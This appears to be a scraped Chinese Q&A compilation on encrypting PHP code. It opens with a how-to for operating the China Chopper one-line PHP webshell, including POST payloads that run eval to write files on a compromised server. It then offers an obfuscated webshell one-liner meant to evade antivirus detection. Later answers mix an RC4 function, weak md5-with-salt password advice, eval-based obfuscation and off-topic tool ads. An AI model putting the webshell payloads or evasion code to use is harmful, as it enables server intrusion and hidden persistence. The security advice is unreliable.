php一句話加密
首先,我們必須了解菜刀是如何通過一句話木馬來實現web伺服器的文件管理的。
下面是最常見的php一句話木馬:
當我們將一句話木馬上傳到web伺服器上後,我們就可以直接在菜刀中輸入上面的密碼(如上例中的1)連接到伺服器上來管理文件。
那麼,此處的菜刀如何通過簡單的一句話就可以實現對伺服器的管理和控制呢?通過分析菜刀的原理,我們不難發現菜刀是利用了eval這個函數來執行通過POST方法傳過來的命令語句。
因此,如果我們想通過菜刀一句話木馬來實現文件上傳的話,只需要向遠程服務里上包含一句話的url發送一個帶文件寫入命令的POST請求即可,比如:
POST:
1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
上面代碼包含2個部分:
1. 一句話的密碼
2. 發送給伺服器端的php執行代碼
既然知道原理了,我們只需要發送如下的POST請求即可完成利用一句話上傳文件的功能:
POST:
1=@eval(base64_decode($_POST[z0]));&z0=+ZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
仔細分析一下這段POST數據包含以下幾個部分:
1. 首先是php一句話的密碼1
2. 通過eval方法來執行base64解碼後的z0,解碼整理後顯示如下:
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i
3. 在z0中繼續調用base64解碼後的z1和z2,解碼後如下:
z1=/var/www/root/1.txt
z2=hello world!
至此,我們可以很清楚的發現上面的POST請求的作用實際上是將一個寫有hello world!的名為1.txt的文件上傳至伺服器
『貳』 免殺php一句話一般有哪些加密方式
?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b({chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?這個我是在後盾人學會的隱藏性很高,現在去有活動送價值兩千元後盾人會員卡
『叄』 php 怎麼用zend加密
可以加密就可以解密。
解密ZEND加密後的PHP文件:
zend加密php文件解密工具Dezender可以做到。
1、下載Dezender.zip
2、解壓到盤裡面,最好不要有中文路徑,比如解壓到 I:Dezender 裡面,修改I:DezenderPHP5PHP5php.ini文件,修改裡面的文件路徑。
『肆』 如何給php代碼加密
前台加密
後台接收到後
在和鹽值拼接
在加密
存入資料庫
我用md5舉例
前台:md5(pwd);
//前台找一個js加密擴展就行
後台:
$salt
=
mt_rand(100000,999999);
//隨機鹽值
$pwd
=
md5($_GET('pwd').$salt);
//這樣雙重加密後入庫了
登錄驗證時
前台也記得加密哦
『伍』 php如何對文件進行RC4加密
不清楚。
給文件加密,我使用的是超級加密3000.
超級加密 3000採用先進的加密演算法,使你的文件和文件夾加密後,真正的達到超高的加密強度,讓你的加密數據無懈可擊。
『陸』 php一句話利用 我想知道下面這句話怎麼利用
打開瀏覽器訪問url後面加上參數ccc=base64加密後的php代碼,這樣伺服器就會執行你所傳輸的代碼。這就是一句話利用的意義!
『柒』 php文本加密函數
給你個我常用的,也符合你的要求,很好用哦。 /**
* 採用RC4為核心演算法,通過加密或者解密用戶信息
* @param $string - 加密或解密的串
* @param $operation - DECODE 解密;ENCODE 加密
* @param $key - 密鑰 默認為AUTHKEY常量
* @return 返回字元串
*/ define('AUTHKEY', 'yl_chen');
function MooAuthCode($string, $operation = 'DECODE', $key = '', $expiry = 0) { /**
* $ckey_length 隨機密鑰長度 取值 0-32;
* 加入隨機密鑰,可以令密文無任何規律,即便是原文和密鑰完全相同,加密結果也會每次不同,增大破解難度。
* 取值越大,密文變動規律越大,密文變化 = 16 的 $ckey_length 次方
* 當此值為 0 時,則不產生隨機密鑰
*/
$ckey_length = 4;
$key = md5($key ? $key : md5(AUTHKEY.$_SERVER['HTTP_USER_AGENT']));
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string); $result = '';
$box = range(0, 255); $rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
} for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
} for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
} if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}}
『捌』 php7代碼如何加密
我們先寫出函數:
<?php
function encode_file_contents($filename) {
$type=strtolower(substr(strrchr($filename,'.'),1));
if ('php' == $type && is_file($filename) && is_writable($filename)) { //
如果是PHP文件 並且可寫 則進行壓縮編碼
$contents = file_get_contents($filename); // 判斷文件是否已經被編碼處
理
$contents = php_strip_whitespace($filename);
// 去除PHP頭部和尾部標識
$headerPos = strpos($contents,'<?php');
$footerPos = strrpos($contents,'?>');
$contents = substr($contents, $headerPos + 5, $footerPos -
$headerPos);
$encode = base64_encode(gzdeflate($contents)); // 開始編碼
$encode = '<?php'." eval(gzinflate(base64_decode("."'".
$encode."'"."))); ?>";
return file_put_contents($filename, $encode);
}
return false;
}
調用此函數:
$filename = 'result1.php';
encode_file_contents($filename);
echo "OK,加密完成!";
?>
3
測試是否加密成功:文件名為result1.php,運行代碼
4
運行成功。
『玖』 如何給編寫的PHP程序加密
你可以去下載一個
SourceCop for PHP
是一款 Windows 平台應用程序,你可以使用它加密你的 PHP 源代碼
另外,你也可以限制加密後的 PHP 腳本代碼運行於指定的 IP 或設定腳本代碼的到期時限。
程序特徵
* 獨特和非常簡單的程序界面
* 加密你的 PHP 源代碼
* 不需要安裝在伺服器上
* 方案非常容易操作
* 原始代碼備份選項
* 單擊進行加密
* 加密後的腳本代碼可以運行於任何平台和 PHP 的大部分版本
其實PHP沒必要加密 加密怎麼都會對你程序有影響
『拾』 PHP如何加密,密文能比較短
用超級兔子比較好點
超級兔子他可以幫你加密文件也可以幫你隱藏你的加密文件
這樣比較保險點`!